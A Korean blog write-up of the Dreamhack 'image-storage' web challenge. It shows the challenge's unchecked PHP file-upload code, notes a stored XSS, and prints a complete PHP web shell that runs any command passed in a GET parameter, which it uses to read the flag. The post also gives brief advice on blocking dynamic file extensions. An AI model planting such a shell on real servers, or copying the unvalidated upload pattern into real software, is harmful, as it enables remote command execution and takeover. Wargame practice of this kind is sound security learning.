[Web] File Vulnerability 실습 (Dreamhack 'image-storage' 문제)

🔐 Security/Web

[Web] File Vulnerability 실습 (Dreamhack 'image-storage' 문제)

Rosieblue 2023. 9. 26. 16:13

728x90

list.php

<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Image Storage</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Image Storage</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/list.php">List</a></li>
            <li><a href="/upload.php">Upload</a></li>
          </ul>

        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container"><ul>
    <?php
        $directory = './uploads/';
        $scanned_directory = array_diff(scandir($directory), array('..', '.', 'index.html'));
        foreach ($scanned_directory as $key => $value) {
            echo "<li><a href='{$directory}{$value}'>".$value."</a></li><br/>";
        }
    ?> 
    </ul></div> 
</body>
</html>

..,.,index.html을 제외한 파일들을 나열하고 있다.

그리고 a 태그를 이용하기 때문에 파일들을 누르면 거기로 들어갈 수 있게 된다.

upload.php

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>
<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css">
<title>Image Storage</title>
</head>
<body>
    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="/">Image Storage</a>
        </div>
        <div id="navbar">
          <ul class="nav navbar-nav">
            <li><a href="/">Home</a></li>
            <li><a href="/list.php">List</a></li>
            <li><a href="/upload.php">Upload</a></li>
          </ul>
        </div><!--/.nav-collapse -->
      </div>
    </nav><br/><br/><br/>
    <div class="container">
      <form enctype='multipart/form-data' method="POST">
        <div class="form-group">
          <label for="InputFile">파일 업로드</label>
          <input type="file" id="InputFile" name="file">
        </div>
        <input type="submit" class="btn btn-default" value="Upload">
      </form>
    </div> 
</body>
</html>

파일 확장자등에 대한 검증 없이 그냥 올릴 수 있게 하고 있다.

그리고 어느 경로에 저장되었는지 또한 출력해주고 있다

간단한 스크립트 파일로 1을 출력하게 해주었더니 얘도 실행이 잘 되었다.

따라서 Stored XSS 또한 가능한 것으로 보인다.

따라서 웹쉘을 업로드하고 url을 통해 해당 경로에 접근해서 웹쉘을 실행하면 될 것 같다.

파일의 확장자나 응답의 Conetent-Type에 의해 웹 브라우저는 이를 다르게 처리하게된다.

예를 들어 php,asp,jsp의 확장자를 가진 웹 리소스에 접근하는 경우, 이 파일을 실행하게 된다. (따라서 이와같은 동적 리소스의 확장자는 보안적으로 막아두는 것이 안전할 것이다)

또한 서버의 파일 시스템을 이용하는 것이 아니라 클라우드 환경을 이용하면 좋다.

AWS, Azure, GCP와 같은 정적 스토리지가 이 예시이다.

아무튼 간단한 웹쉘을 작성하자

(출처: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 ) 
<html>
<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
		<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
		<input type="SUBMIT" value="Execute">
	</form>
<pre>
 <?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?></pre>
</body>
</html>

이를 업로드하고 명령어를 실행하니 플래그를 읽을 수 있었다!